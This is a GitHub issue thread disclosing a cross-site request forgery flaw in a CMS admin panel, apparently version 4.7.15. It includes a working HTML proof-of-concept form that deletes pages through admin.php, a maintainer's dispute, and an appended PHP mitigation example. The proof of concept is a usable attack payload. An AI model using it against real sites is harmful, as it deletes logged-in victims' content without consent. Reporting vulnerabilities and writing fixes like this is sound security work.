CSRF Application Wide
devansh3008 opened this issue · 2 comments
devansh3008 commented
I have found multiple CSRF issues on the following version: 4.7.15
There is no anti-CSRF token and no SameSite cookie being used. All endpoints are vulnerable, even in 4.7.16-dev4.
The user only needs to be logged in (no password is required to perform this issue)
Valid POC: (exploit.html)
```html
<html><head>
<title>CSRF PoC - Generated By AppSec Labs csrf-generator</title>
</head><body>
<form action="http://localhost/admin.php?action=deletepage&var1=csrf" method="GET">
<input type="text" name="action" value="deletepage" /><br />
<input type="text" name="var1" value="csrf" /><br />
<input type='submit' value='Go!' />
</form>
</body>
</html>
```
Click on this HTML page and you can see that you delete page/trashcan objects. The issue is being reported by me on huntr.io. I am adding this as a reference for you to go over the images.
BSteelooper commented
This is not a bug, this is doing something as an authenticated user. This is not possible remotely, or when you are not logged on.
devansh3008 commented
The CSRF issue requires a victim user to be authenticated. When he clicks on the HTML PoC, the exploit would be executed.
Thanks,
Devansh
On Mon, Feb 20, 2023, 15:50 Bas Steelooper ***@***.***> wrote:
> This is not a bug, this is doing something as an authenticated user. This
> is not possible remotely, or when you are not logged on.
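A server-side mitigation for the two gaps named in this thread (no anti-CSRF token, no SameSite cookie), as an added example that is not the project's own code. The function names and the `csrf_token` field name are assumptions, and the requests at the end are constructed.

```php
<?php
declare(strict_types=1);

// Hypothetical helpers for illustration; not taken from the project under discussion.

// Start the session with a cookie that browsers withhold from cross-site requests.
function start_hardened_session(): void
{
    session_set_cookie_params([
        'httponly' => true,
        'samesite' => 'Strict', // array form requires PHP >= 7.3
    ]);
    session_start();
}

// Return the per-session token, creating it on first use.
// Each admin form embeds it in a hidden field named csrf_token.
function csrf_token(array &$session): string
{
    if (empty($session['csrf_token'])) {
        $session['csrf_token'] = bin2hex(random_bytes(32));
    }
    return $session['csrf_token'];
}

// Decide whether a state-changing request (such as deleting a page) may proceed.
function csrf_request_allowed(string $method, array $post, array $session): bool
{
    if ($method !== 'POST') {
        return false; // state changes are refused on GET, the method the PoC form uses
    }
    $sent = $post['csrf_token'] ?? '';
    $expected = $session['csrf_token'] ?? '';
    // Constant-time comparison; an absent or non-string token always fails.
    return is_string($sent) && is_string($expected) && $expected !== ''
        && hash_equals($expected, $sent);
}

// Constructed requests, run from the CLI with an in-memory session array.
$session = [];
$token = csrf_token($session);
var_dump(csrf_request_allowed('GET', [], $session));                          // PoC shape: GET, no token
var_dump(csrf_request_allowed('POST', ['csrf_token' => 'guess'], $session)); // cross-site POST with a wrong token
var_dump(csrf_request_allowed('POST', ['csrf_token' => $token], $session));  // form rendered by the application
```

In a real handler the check would receive `$_SERVER['REQUEST_METHOD']`, `$_POST` and `$_SESSION`, and would run before any action dispatch.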